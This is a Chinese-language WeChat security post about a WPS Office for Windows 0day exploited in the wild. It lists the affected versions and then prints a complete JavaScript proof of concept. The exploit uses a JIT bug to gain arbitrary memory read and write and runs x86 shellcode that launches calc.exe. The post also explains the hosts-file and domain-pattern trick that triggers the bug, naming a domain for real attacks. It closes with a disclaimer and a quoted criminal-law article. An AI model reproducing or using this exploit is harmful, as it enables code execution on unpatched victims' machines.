一、问题描述
近日,监测发现WPS Officefor Windows版本 存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件;目前已经发现了该0day漏洞的在野利用。
二、影响版本
WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
今天早上群里传疯了,到现在才拥有详细的漏洞POC,各位可以根据情报对自己的WPS进行版本检查,不要打开任意互联网上的文档等其他内容。
三、POC
<script>if(typeof alert === "undefined"){alert = console.log;}let f64 = new Float64Array(1);let u32 = new Uint32Array(f64.buffer);function d2u(v) {f64[0] = v;return u32;}function u2d(lo, hi) {u32[0] = lo;u32[1] = hi;return f64[0];}function gc(){ // majorfor (let i = 0; i < 0x10; i++) {new Array(0x100000);}}function foo(bug) {function C(z) {Error.prepareStackTrace = function(t, B) {return B[z].getThis();};let p = Error().stack;Error.prepareStackTrace = null;return p;}function J() {}var optim = false;var opt = new Function('a', 'b', 'c','if(typeof a==='number'){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +'g++;'.repeat(70));var e = null;J.prototype.d = new Function('a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');J.prototype.a = new Function('a', 'a.b(0,a)');J.prototype.b = new Function('a', 'b','b.c();if(a){' +'g++;'.repeat(70) + '}');J.prototype.c = function() {if (optim) {var z = C(3);var p = C(3);z[0] = 0;e = {M: z, C: p};}};var a = new J();// jit optimif (bug) {for (var V = 0; 1E4 > V; V++) {opt(0 == V % 4 ? 1 : 4, a, 1);}}optim = true;opt(1, a, 1);return e;}e1 = foo(false);e2 = foo(true);delete e2.M[0];let hole = e2.C[0];let map = new Map();map.set('asd', 8);map.set(hole, 0x8);map.delete(hole);map.delete(hole);map.delete("asd");map.set(0x20, "aaaa");let arr3 = new Array(0);let arr4 = new Array(0);let arr5 = new Array(1);let oob_array = [];oob_array.push(1.1);map.set("1", -1);let obj_array = {m: 1337, target: gc};let ab = new ArrayBuffer(1337);let object_idx = undefined;let object_idx_flag = undefined;let max_size = 0x1000;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 0xa72) {object_idx = i;object_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 0xa72) {object_idx = i + 1;object_idx_flag = 0;break;}}function addrof(obj_para) {obj_array.target = obj_para;let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;obj_array.target = gc;return addr;}function fakeobj(addr) {let r8 = d2u(oob_array[object_idx]);if (object_idx_flag === 0) {oob_array[object_idx] = u2d(addr, r8[1]);}else {oob_array[object_idx] = u2d(r8[0], addr);}return obj_array.target;}let bk_idx = undefined;let bk_idx_flag = undefined;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 1337) {bk_idx = i;bk_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 1337) {bk_idx = i + 1;bk_idx_flag = 0;break;}}let dv = new DataView(ab);function get_32(addr) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}let val = dv.getUint32(0, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);return val;}function set_32(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint32(0, val, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);}function write8(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint8(0, val);}let fake_length = get_32(addrof(oob_array)+12);set_32(get_32(addrof(oob_array)+8)+4,fake_length);let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasm_mod = new WebAssembly.Module(wasm_code);let wasm_instance = new WebAssembly.Instance(wasm_mod);let f = wasm_instance.exports.main;let target_addr = addrof(wasm_instance)+0x40;let rwx_mem = get_32(target_addr);//alert("rwx_mem is"+rwx_mem.toString(16));const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);for(let i=0;i<shellcode.length;i++){write8(rwx_mem+i,shellcode[i]);}f();</script>
细节
需要将在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn即可,cloudwps.cn和wps.cn没有任何关系。正常攻击,也可以使用clientweb.docer.wps.cn.hellowps.cn.
关于漏洞利用,有人说是老洞,有人说是伪协议,云里雾里,建议直接升级成官方最新版。
我一个会点鼠标的猴子,一个早上给我搞得一愣一愣的。哎,网安路本就逆天而行!!!
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(巢安实验室):WPS Officefor Windows存在高危0day漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论